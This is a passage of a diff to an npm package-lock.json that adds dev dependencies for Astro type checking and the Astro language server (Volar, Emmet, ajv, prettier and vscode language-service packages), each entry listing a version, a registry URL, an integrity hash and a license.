"^5.0.0 || ^6.0.0" + } + }, + "node_modules/@astrojs/check/node_modules/chokidar": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-4.0.3.tgz", + "integrity": "sha512-Qgzu8kfBvo+cA4962jnP1KkS6Dop5NS6g7R5LFYJr4b8Ub94PPQXUksCw9PvXoeXPRRddRNC5C1JQUR2SMGtnA==", + "dev": true, + "license": "MIT", + "dependencies": { + "readdirp": "^4.0.1" + }, + "engines": { + "node": ">= 14.16.0" + }, + "funding": { + "url": "https://paulmillr.com/funding/" + } + }, + "node_modules/@astrojs/check/node_modules/kleur": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/kleur/-/kleur-4.1.5.tgz", + "integrity": "sha512-o+NO+8WrRiQEE4/7nwRJhN1HWpVmJm511pBHUxPLtp0BUISzlBplORYSmTclCnJvQq2tKu/sgl3xVpkc7ZWuQQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/@astrojs/check/node_modules/readdirp": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-4.1.2.tgz", + "integrity": "sha512-GDhwkLfywWL2s6vEjyhri+eXmfH6j1L7JE27WhqLeYzoh/A3DBaYGEj2H/HFZCn/kMfim73FXxEJTw06WtxQwg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 14.18.0" + }, + "funding": { + "type": "individual", + "url": "https://paulmillr.com/funding/" } }, "node_modules/@astrojs/compiler": { @@ -34,6 +97,48 @@ "integrity": "sha512-GOle7smBWKfMSP8osUIGOlB5kaHdQLV3foCsf+5Q9Wsuu+C6Fs3Ez/ttXmhjZ1HkSgsogcM1RXSjjOVieHq16Q==", "license": "MIT" }, + "node_modules/@astrojs/language-server": { + "version": "2.16.16", + "resolved": "https://registry.npmjs.org/@astrojs/language-server/-/language-server-2.16.16.tgz", + "integrity": "sha512-KuS17AOOqH/M5mHXPmKvtp8L+NNteARC7Xjf395+9R9dtJOBndqdStwU4V+OKzYZpgZ+hliV13knzx/oMtFl7Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@astrojs/compiler": "^2.13.1", + "@astrojs/yaml2ts": "^0.2.4", + "@jridgewell/sourcemap-codec": "^1.5.5", + "@volar/kit": "~2.4.28", + "@volar/language-core": "~2.4.28", + "@volar/language-server": "~2.4.28", + "@volar/language-service": "~2.4.28", + "muggle-string": "^0.4.1", + "tinyglobby": "^0.2.16", + "volar-service-css": "0.0.71", + "volar-service-emmet": "0.0.71", + "volar-service-html": "0.0.71", + "volar-service-prettier": "0.0.71", + "volar-service-typescript": "0.0.71", + "volar-service-typescript-twoslash-queries": "0.0.71", + "volar-service-yaml": "0.0.71", + "vscode-html-languageservice": "^5.6.2", + "vscode-uri": "^3.1.0" + }, + "bin": { + "astro-ls": "bin/nodeServer.js" + }, + "peerDependencies": { + "prettier": "^3.0.0", + "prettier-plugin-astro": ">=0.11.0" + }, + "peerDependenciesMeta": { + "prettier": { + "optional": true + }, + "prettier-plugin-astro": { + "optional": true + } + } + }, "node_modules/@astrojs/markdown-remark": { "version": "6.3.11", "resolved": "https://registry.npmjs.org/@astrojs/markdown-remark/-/markdown-remark-6.3.11.tgz", @@ -139,6 +244,16 @@ "node": "18.20.8 || ^20.3.0 || >=22.0.0" } }, + "node_modules/@astrojs/yaml2ts": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/@astrojs/yaml2ts/-/yaml2ts-0.2.4.tgz", + "integrity": "sha512-8oddpOae35pJsXPQXhTkM0ypfKPskVsh2bCxRtbf7e+/Epw2nReakFYpLKjZMEr75CsoF203PMnCocpfz0s69A==", + "dev": true, + "license": "MIT", + "dependencies": { + "yaml": "^2.8.3" + } + }, "node_modules/@babel/helper-string-parser": { "version": "7.29.7", "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.29.7.tgz", @@ -197,6 +312,68 @@ "node": ">=18" } }, + "node_modules/@emmetio/abbreviation": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/@emmetio/abbreviation/-/abbreviation-2.3.3.tgz", + "integrity": "sha512-mgv58UrU3rh4YgbE/TzgLQwJ3pFsHHhCLqY20aJq+9comytTXUDNGG/SMtSeMJdkpxgXSXunBGLD8Boka3JyVA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@emmetio/scanner": "^1.0.4" + } + }, + "node_modules/@emmetio/css-abbreviation": { + "version": "2.1.8", + "resolved": "https://registry.npmjs.org/@emmetio/css-abbreviation/-/css-abbreviation-2.1.8.tgz", + "integrity": "sha512-s9yjhJ6saOO/uk1V74eifykk2CBYi01STTK3WlXWGOepyKa23ymJ053+DNQjpFcy1ingpaO7AxCcwLvHFY9tuw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@emmetio/scanner": "^1.0.4" + } + }, + "node_modules/@emmetio/css-parser": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/@emmetio/css-parser/-/css-parser-0.4.1.tgz", + "integrity": "sha512-2bC6m0MV/voF4CTZiAbG5MWKbq5EBmDPKu9Sb7s7nVcEzNQlrZP6mFFFlIaISM8X6514H9shWMme1fCm8cWAfQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@emmetio/stream-reader": "^2.2.0", + "@emmetio/stream-reader-utils": "^0.1.0" + } + }, + "node_modules/@emmetio/html-matcher": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@emmetio/html-matcher/-/html-matcher-1.3.0.tgz", + "integrity": "sha512-NTbsvppE5eVyBMuyGfVu2CRrLvo7J4YHb6t9sBFLyY03WYhXET37qA4zOYUjBWFCRHO7pS1B9khERtY0f5JXPQ==", + "dev": true, + "license": "ISC", + "dependencies": { + "@emmetio/scanner": "^1.0.0" + } + }, + "node_modules/@emmetio/scanner": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@emmetio/scanner/-/scanner-1.0.4.tgz", + "integrity": "sha512-IqRuJtQff7YHHBk4G8YZ45uB9BaAGcwQeVzgj/zj8/UdOhtQpEIupUhSk8dys6spFIWVZVeK20CzGEnqR5SbqA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@emmetio/stream-reader": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@emmetio/stream-reader/-/stream-reader-2.2.0.tgz", + "integrity": "sha512-fXVXEyFA5Yv3M3n8sUGT7+fvecGrZP4k6FnWWMSZVQf69kAq0LLpaBQLGcPR30m3zMmKYhECP4k/ZkzvhEW5kw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@emmetio/stream-reader-utils": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/@emmetio/stream-reader-utils/-/stream-reader-utils-0.1.0.tgz", + "integrity": "sha512-ZsZ2I9Vzso3Ho/pjZFsmmZ++FWeEd/txqybHTm4OgaZzdS8V9V/YYWQwg5TC38Z7uLWUV1vavpLLbjJtKubR1A==", + "dev": true, + "license": "MIT" + }, "node_modules/@emnapi/runtime": { "version": "1.11.3", "resolved": "https://registry.npmjs.org/@emnapi/runtime/-/runtime-1.11.3.tgz", @@ -1889,6 +2066,104 @@ "integrity": "sha512-1mEZtMKPM09vDmQt5y7YvmN2+DFTP7Tg0EWXdic8/C6VRnpb33e4ghisCIE3WZjsE2N8mf+QV1Zqh7ZFYLWInQ==", "license": "ISC" }, + "node_modules/@volar/kit": { + "version": "2.4.28", + "resolved": "https://registry.npmjs.org/@volar/kit/-/kit-2.4.28.tgz", + "integrity": "sha512-cKX4vK9dtZvDRaAzeoUdaAJEew6IdxHNCRrdp5Kvcl6zZOqb6jTOfk3kXkIkG3T7oTFXguEMt5+9ptyqYR84Pg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@volar/language-service": "2.4.28", + "@volar/typescript": "2.4.28", + "typesafe-path": "^0.2.2", + "vscode-languageserver-textdocument": "^1.0.11", + "vscode-uri": "^3.0.8" + }, + "peerDependencies": { + "typescript": "*" + } + }, + "node_modules/@volar/language-core": { + "version": "2.4.28", + "resolved": "https://registry.npmjs.org/@volar/language-core/-/language-core-2.4.28.tgz", + "integrity": "sha512-w4qhIJ8ZSitgLAkVay6AbcnC7gP3glYM3fYwKV3srj8m494E3xtrCv6E+bWviiK/8hs6e6t1ij1s2Endql7vzQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@volar/source-map": "2.4.28" + } + }, + "node_modules/@volar/language-server": { + "version": "2.4.28", + "resolved": "https://registry.npmjs.org/@volar/language-server/-/language-server-2.4.28.tgz", + "integrity": "sha512-NqcLnE5gERKuS4PUFwlhMxf6vqYo7hXtbMFbViXcbVkbZ905AIVWhnSo0ZNBC2V127H1/2zP7RvVOVnyITFfBw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@volar/language-core": "2.4.28", + "@volar/language-service": "2.4.28", + "@volar/typescript": "2.4.28", + "path-browserify": "^1.0.1", + "request-light": "^0.7.0", + "vscode-languageserver": "^9.0.1", + "vscode-languageserver-protocol": "^3.17.5", + "vscode-languageserver-textdocument": "^1.0.11", + "vscode-uri": "^3.0.8" + } + }, + "node_modules/@volar/language-service": { + "version": "2.4.28", + "resolved": "https://registry.npmjs.org/@volar/language-service/-/language-service-2.4.28.tgz", + "integrity": "sha512-Rh/wYCZJrI5vCwMk9xyw/Z+MsWxlJY1rmMZPsxUoJKfzIRjS/NF1NmnuEcrMbEVGja00aVpCsInJfixQTMdvLw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@volar/language-core": "2.4.28", + "vscode-languageserver-protocol": "^3.17.5", + "vscode-languageserver-textdocument": "^1.0.11", + "vscode-uri": "^3.0.8" + } + }, + "node_modules/@volar/source-map": { + "version": "2.4.28", + "resolved": "https://registry.npmjs.org/@volar/source-map/-/source-map-2.4.28.tgz", + "integrity": "sha512-yX2BDBqJkRXfKw8my8VarTyjv48QwxdJtvRgUpNE5erCsgEUdI2DsLbpa+rOQVAJYshY99szEcRDmyHbF10ggQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@volar/typescript": { + "version": "2.4.28", + "resolved": "https://registry.npmjs.org/@volar/typescript/-/typescript-2.4.28.tgz", + "integrity": "sha512-Ja6yvWrbis2QtN4ClAKreeUZPVYMARDYZl9LMEv1iQ1QdepB6wn0jTRxA9MftYmYa4DQ4k/DaSZpFPUfxl8giw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@volar/language-core": "2.4.28", + "path-browserify": "^1.0.1", + "vscode-uri": "^3.0.8" + } + }, + "node_modules/@vscode/emmet-helper": { + "version": "2.11.0", + "resolved": "https://registry.npmjs.org/@vscode/emmet-helper/-/emmet-helper-2.11.0.tgz", + "integrity": "sha512-QLxjQR3imPZPQltfbWRnHU6JecWTF1QSWhx3GAKQpslx7y3Dp6sIIXhKjiUJ/BR9FX8PVthjr9PD6pNwOJfAzw==", + "dev": true, + "license": "MIT", + "dependencies": { + "emmet": "^2.4.3", + "jsonc-parser": "^2.3.0", + "vscode-languageserver-textdocument": "^1.0.1", + "vscode-languageserver-types": "^3.15.1", + "vscode-uri": "^3.0.8" + } + }, + "node_modules/@vscode/l10n": { + "version": "0.0.18", + "resolved": "https://registry.npmjs.org/@vscode/l10n/-/l10n-0.0.18.tgz", + "integrity": "sha512-KYSIHVmslkaCDyw013pphY+d7x1qV8IZupYfeIfzNA+nsaWHbn5uPuQRvdRFsa9zFzGeudPuoGoZ1Op4jrJXIQ==", + "dev": true, + "license": "MIT" + }, "node_modules/acorn": { "version": "8.18.0", "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.18.0.tgz", @@ -1910,6 +2185,48 @@ "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" } }, + "node_modules/ajv": { + "version": "8.20.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.20.0.tgz", + "integrity": "sha512-Thbli+OlOj+iMPYFBVBfJ3OmCAnaSyNn4M1vz9T6Gka5Jt9ba/HIR56joy65tY6kx/FCF5VXNB819Y7/GUrBGA==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/ajv-draft-04": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/ajv-draft-04/-/ajv-draft-04-1.0.0.tgz", + "integrity": "sha512-mv00Te6nmYbRp5DCwclxtt7yV/joXJPGS7nM+97GdxvuttCOfgI3K4U25zboyeX0O+myI8ERluxQe5wljMmVIw==", + "dev": true, + "license": "MIT", + "peerDependencies": { + "ajv": "^8.5.0" + }, + "peerDependenciesMeta": { + "ajv": { + "optional": true + } + } + }, + "node_modules/ajv-i18n": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/ajv-i18n/-/ajv-i18n-4.2.0.tgz", + "integrity": "sha512-v/ei2UkCEeuKNXh8RToiFsUclmU+G57LO1Oo22OagNMENIw+Yb8eMwvHu7Vn9fmkjJyv6XclhJ8TbuigSglPkg==", + "dev": true, + "license": "MIT", + "peerDependencies": { + "ajv": "^8.0.0-beta.0" + } + }, "node_modules/ansi-align": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/ansi-align/-/ansi-align-3.0.1.tgz", @@ -3310,6 +3627,21 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/cliui": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-9.0.1.tgz", + "integrity": "sha512-k7ndgKhwoQveBL+/1tqGJYNz097I7WOvwbmmU2AR5+magtbjPWQTS1C5vzGkBC8Ym8UWRzfKUzUUqFLypY4Q+w==", + "dev": true, + "license": "ISC", + "dependencies": { + "string-width": "^7.2.0", + "strip-ansi": "^7.1.0", + "wrap-ansi": "^9.0.0" + }, + "engines": { + "node": ">=20" + } + }, "node_modules/clsx": { "version": "2.1.1", "resolved": "https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz", @@ -3650,6 +3982,23 @@ "node": ">=4" } }, + "node_modules/emmet": { + "version": "2.4.11", + "resolved": "https://registry.npmjs.org/emmet/-/emmet-2.4.11.tgz", + "integrity": "sha512-23QPJB3moh/U9sT4rQzGgeyyGIrcM+GH5uVYg2C6wZIxAIJq7Ng3QLT79tl8FUwDXhyq9SusfknOrofAKqvgyQ==", + "dev": true, + "license": "MIT", + "workspaces": [ + "./packages/scanner", + "./packages/abbreviation", + "./packages/css-abbreviation", + "./" + ], + "dependencies": { + "@emmetio/abbreviation": "^2.3.3", + "@emmetio/css-abbreviation": "^2.1.8" + } + }, "node_modules/emoji-regex": { "version": "10.6.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz", @@ -3747,6 +4096,16 @@ "@esbuild/win32-x64": "0.25.12" } }, + "node_modules/escalade": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, "node_modules/escape-string-regexp": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-5.0.0.tgz", @@ -3862,6 +4221,30 @@ "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", "license": "MIT" }, + "node_modules/fast-deep-equal": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", + "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", + "dev": true, + "license": "MIT" + }, + "node_modules/fast-uri": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.1.7.tgz", + "integrity": "sha512-dOvZVzjdZdz7phd9v6jCbwxrBW3fK6n8Rc0CtdmM4bumzMnxywBYhuph6J819RRw/ku+rLbelwfMunktuzVVHg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/fastify" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/fastify" + } + ], + "license": "BSD-3-Clause" + }, "node_modules/fdir": { "version": "6.5.0", "resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz", @@ -3923,6 +4306,16 @@ "node": "^8.16.0 || ^10.6.0 || >=11.0.0" } }, + "node_modules/get-caller-file": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", + "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "dev": true, + "license": "ISC", + "engines": { + "node": "6.* || 8.* || >= 10.*" + } + }, "node_modules/get-east-asian-width": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/get-east-asian-width/-/get-east-asian-width-1.6.0.tgz", @@ -4372,6 +4765,20 @@ "js-yaml": "bin/js-yaml.js" } }, + "node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/jsonc-parser": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/jsonc-parser/-/jsonc-parser-2.3.1.tgz", + "integrity": "sha512-H8jvkz1O50L3dMZCsLqiuB2tA7muqbSg1AtGEkN0leAqGjsUzDJir3Zwr02BhqdcITPg3ei3mZ+HjMocAknhhg==", + "dev": true, + "license": "MIT" + }, "node_modules/kleur": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", @@ -5482,6 +5889,13 @@ "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", "license": "MIT" }, + "node_modules/muggle-string": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/muggle-string/-/muggle-string-0.4.1.tgz", + "integrity": "sha512-VNTrAak/KhO2i8dqqnqnAHOa3cYBwXEZe9h+D5h/1ZqFSTEFHdM65lR7RoIqq3tBBYavsOXV84NoHXZ0AkPyqQ==", + "dev": true, + "license": "MIT" + }, "node_modules/nanoid": { "version": "3.3.18", "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.18.tgz", @@ -5712,6 +6126,13 @@ "url": "https://github.com/inikulin/parse5?sponsor=1" } }, + "node_modules/path-browserify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-browserify/-/path-browserify-1.0.1.tgz", + "integrity": "sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==", + "dev": true, + "license": "MIT" + }, "node_modules/piccolore": { "version": "0.1.3", "resolved": "https://registry.npmjs.org/piccolore/-/piccolore-0.1.3.tgz", @@ -5764,6 +6185,22 @@ "node": "^10 || ^12 || >=14" } }, + "node_modules/prettier": { + "version": "3.9.6", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.9.6.tgz", + "integrity": "sha512-OpN0zzVdiaiAhxpuuj5efpIS4sY9j7bY6uR5mnj5yPzGkdkjNKSJeUThPb60Jw29QuAZgA4o+/iB49kFiaBX6g==", + "dev": true, + "license": "MIT", + "bin": { + "prettier": "bin/prettier.cjs" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, "node_modules/prismjs": { "version": "1.30.0", "resolved": "https://registry.npmjs.org/prismjs/-/prismjs-1.30.0.tgz", @@ -6077,6 +6514,23 @@ "url": "https://opencollective.com/unified" } }, + "node_modules/request-light": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/request-light/-/request-light-0.7.0.tgz", + "integrity": "sha512-lMbBMrDoxgsyO+yB3sDcrDuX85yYt7sS8BfQd11jtbW/z5ZWgLZRcEGLsLoYw7I0WSUGQBs8CC8ScIxkTX1+6Q==", + "dev": true, + "license": "MIT" + }, + "node_modules/require-from-string": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", + "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, "node_modules/retext": { "version": "9.0.0", "resolved": "https://registry.npmjs.org/retext/-/retext-9.0.0.tgz", @@ -6514,6 +6968,13 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/typesafe-path": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/typesafe-path/-/typesafe-path-0.2.2.tgz", + "integrity": "sha512-OJabfkAg1WLZSqJAJ0Z6Sdt3utnbzr/jh+NAHoyWHJe8CMSy79Gm085094M9nvTPy22KzTVn5Zq5mbapCI/hPA==", + "dev": true, + "license": "MIT" + }, "node_modules/typescript": { "version": "5.9.3", "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.9.3.tgz", @@ -6528,6 +6989,16 @@ "node": ">=14.17" } }, + "node_modules/typescript-auto-import-cache": { + "version": "0.3.6", + "resolved": "https://registry.npmjs.org/typescript-auto-import-cache/-/typescript-auto-import-cache-0.3.6.tgz", + "integrity": "sha512-RpuHXrknHdVdK7wv/8ug3Fr0WNsNi5l5aB8MYYuXhq2UH5lnEB1htJ1smhtD5VeCsGr2p8mUDtd83LCQDFVgjQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "semver": "^7.3.8" + } + }, "node_modules/ufo": { "version": "1.6.4", "resolved": "https://registry.npmjs.org/ufo/-/ufo-1.6.4.tgz", @@ -6958,6 +7429,296 @@ } } }, + "node_modules/volar-service-css": { + "version": "0.0.71", + "resolved": "https://registry.npmjs.org/volar-service-css/-/volar-service-css-0.0.71.tgz", + "integrity": "sha512-wRRFt9BpjMKCazcgOh67MSjUjiWUCAh99DyYSDIOTuxaRjEtDC7PpB0k1Y1wbJIW/pVtMUSVbpPo3UGSm0Byxw==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-css-languageservice": "^6.3.0", + "vscode-languageserver-textdocument": "^1.0.11", + "vscode-uri": "^3.0.8" + }, + "peerDependencies": { + "@volar/language-service": "~2.4.0" + }, + "peerDependenciesMeta": { + "@volar/language-service": { + "optional": true + } + } + }, + "node_modules/volar-service-emmet": { + "version": "0.0.71", + "resolved": "https://registry.npmjs.org/volar-service-emmet/-/volar-service-emmet-0.0.71.tgz", + "integrity": "sha512-zqjzt6bN95e3CUstBm0PBFAJnrfz0ZAARka87fart46/gNCLLuP3Vujy8V/J8HEziTFLnfkgIASLFYPUhonJcA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@emmetio/css-parser": "^0.4.1", + "@emmetio/html-matcher": "^1.3.0", + "@vscode/emmet-helper": "^2.9.3", + "vscode-uri": "^3.0.8" + }, + "peerDependencies": { + "@volar/language-service": "~2.4.0" + }, + "peerDependenciesMeta": { + "@volar/language-service": { + "optional": true + } + } + }, + "node_modules/volar-service-html": { + "version": "0.0.71", + "resolved": "https://registry.npmjs.org/volar-service-html/-/volar-service-html-0.0.71.tgz", + "integrity": "sha512-e8tHPhgQ7ooLfudAEIku+kgd9pWkq3SSz8RbnQDI1+Eb8wbenkLGHqoirLqz5ORLV6wIMr2Iv08RWBG5eOcgpw==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-html-languageservice": "^5.3.0", + "vscode-languageserver-textdocument": "^1.0.11", + "vscode-uri": "^3.0.8" + }, + "peerDependencies": { + "@volar/language-service": "~2.4.0" + }, + "peerDependenciesMeta": { + "@volar/language-service": { + "optional": true + } + } + }, + "node_modules/volar-service-prettier": { + "version": "0.0.71", + "resolved": "https://registry.npmjs.org/volar-service-prettier/-/volar-service-prettier-0.0.71.tgz", + "integrity": "sha512-Rz7JVH3qD108UCdmIEiZvOBNljMt2nLFdbN8AXcDfn7xD9F5I2aCIsDVqBbXw21PsnxG0b7MfwtNF+zPS/NKUg==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-uri": "^3.0.8" + }, + "peerDependencies": { + "@volar/language-service": "~2.4.0", + "prettier": "^2.2 || ^3.0" + }, + "peerDependenciesMeta": { + "@volar/language-service": { + "optional": true + }, + "prettier": { + "optional": true + } + } + }, + "node_modules/volar-service-typescript": { + "version": "0.0.71", + "resolved": "https://registry.npmjs.org/volar-service-typescript/-/volar-service-typescript-0.0.71.tgz", + "integrity": "sha512-yTtM/BVT6hoyEYnDtaCyAtNhdNeS/mhTTABlBOdw3NNiRBUin3IznFJpgfjer4c6RYopiPjjQjc9VFhxVl1mLw==", + "dev": true, + "license": "MIT", + "dependencies": { + "path-browserify": "^1.0.1", + "semver": "^7.6.2", + "typescript-auto-import-cache": "^0.3.5", + "vscode-languageserver-textdocument": "^1.0.11", + "vscode-nls": "^5.2.0", + "vscode-uri": "^3.0.8" + }, + "peerDependencies": { + "@volar/language-service": "~2.4.0" + }, + "peerDependenciesMeta": { + "@volar/language-service": { + "optional": true + } + } + }, + "node_modules/volar-service-typescript-twoslash-queries": { + "version": "0.0.71", + "resolved": "https://registry.npmjs.org/volar-service-typescript-twoslash-queries/-/volar-service-typescript-twoslash-queries-0.0.71.tgz", + "integrity": "sha512-9K2k72s4n7rV9s4bX0MyjbX9iBribvKZbBJKuEmTCZfeWJXs6Yh7bGpY4eoc7UufAjvpheBqwyZCOIPBvxCv0A==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-uri": "^3.0.8" + }, + "peerDependencies": { + "@volar/language-service": "~2.4.0" + }, + "peerDependenciesMeta": { + "@volar/language-service": { + "optional": true + } + } + }, + "node_modules/volar-service-yaml": { + "version": "0.0.71", + "resolved": "https://registry.npmjs.org/volar-service-yaml/-/volar-service-yaml-0.0.71.tgz", + "integrity": "sha512-qYGWGuVpUTnZGu5P/CR4KLK4aIR8RrcVnmfZ2eRcj9q/I8VZCoC5yy9FtEvfNvnDp4MU17yhdJcvpQPIqhJS2Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "vscode-uri": "^3.0.8", + "yaml-language-server": "~1.23.0" + }, + "peerDependencies": { + "@volar/language-service": "~2.4.0" + }, + "peerDependenciesMeta": { + "@volar/language-service": { + "optional": true + } + } + }, + "node_modules/vscode-css-languageservice": { + "version": "6.3.10", + "resolved": "https://registry.npmjs.org/vscode-css-languageservice/-/vscode-css-languageservice-6.3.10.tgz", + "integrity": "sha512-eq5N9Er3fC4vA9zd9EFhyBG90wtCCuXgRSpAndaOgXMh1Wgep5lBgRIeDgjZBW9pa+332yC9+49cZMW8jcL3MA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vscode/l10n": "^0.0.18", + "vscode-languageserver-textdocument": "^1.0.12", + "vscode-languageserver-types": "3.17.5", + "vscode-uri": "^3.1.0" + } + }, + "node_modules/vscode-css-languageservice/node_modules/vscode-languageserver-types": { + "version": "3.17.5", + "resolved": "https://registry.npmjs.org/vscode-languageserver-types/-/vscode-languageserver-types-3.17.5.tgz", + "integrity": "sha512-Ld1VelNuX9pdF39h2Hgaeb5hEZM2Z3jUrrMgWQAu82jMtZp7p3vJT3BzToKtZI7NgQssZje5o0zryOrhQvzQAg==", + "dev": true, + "license": "MIT" + }, + "node_modules/vscode-html-languageservice": { + "version": "5.6.2", + "resolved": "https://registry.npmjs.org/vscode-html-languageservice/-/vscode-html-languageservice-5.6.2.tgz", + "integrity": "sha512-ulCrSnFnfQ16YzvwnYUgEbUEl/ZG7u2eV27YhvLObSHKkb8fw1Z9cgsnUwjTEeDIdJDoTDTDpxuhQwoenoLNMg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vscode/l10n": "^0.0.18", + "vscode-languageserver-textdocument": "^1.0.12", + "vscode-languageserver-types": "^3.17.5", + "vscode-uri": "^3.1.0" + } + }, + "node_modules/vscode-json-languageservice": { + "version": "4.1.8", + "resolved": "https://registry.npmjs.org/vscode-json-languageservice/-/vscode-json-languageservice-4.1.8.tgz", + "integrity": "sha512-0vSpg6Xd9hfV+eZAaYN63xVVMOTmJ4GgHxXnkLCh+9RsQBkWKIghzLhW2B9ebfG+LQQg8uLtsQ2aUKjTgE+QOg==", + "dev": true, + "license": "MIT", + "dependencies": { + "jsonc-parser": "^3.0.0", + "vscode-languageserver-textdocument": "^1.0.1", + "vscode-languageserver-types": "^3.16.0", + "vscode-nls": "^5.0.0", + "vscode-uri": "^3.0.2" + }, + "engines": { + "npm": ">=7.0.0" + } + }, + "node_modules/vscode-json-languageservice/node_modules/jsonc-parser": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/jsonc-parser/-/jsonc-parser-3.3.1.tgz", + "integrity": "sha512-HUgH65KyejrUFPvHFPbqOY0rsFip3Bo5wb4ngvdi1EpCYWUQDC5V+Y7mZws+DLkr4M//zQJoanu1SP+87Dv1oQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/vscode-jsonrpc": { + "version": "9.0.2", + "resolved": 